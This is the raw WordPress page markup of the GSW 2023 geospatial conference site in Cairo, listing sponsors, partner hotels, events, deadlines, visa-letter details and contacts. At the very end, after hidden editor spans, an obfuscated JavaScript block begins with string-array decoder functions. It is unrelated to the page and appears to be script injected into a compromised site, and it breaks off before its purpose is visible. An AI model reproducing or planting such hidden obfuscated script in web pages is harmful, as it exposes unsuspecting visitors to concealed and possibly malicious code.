center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 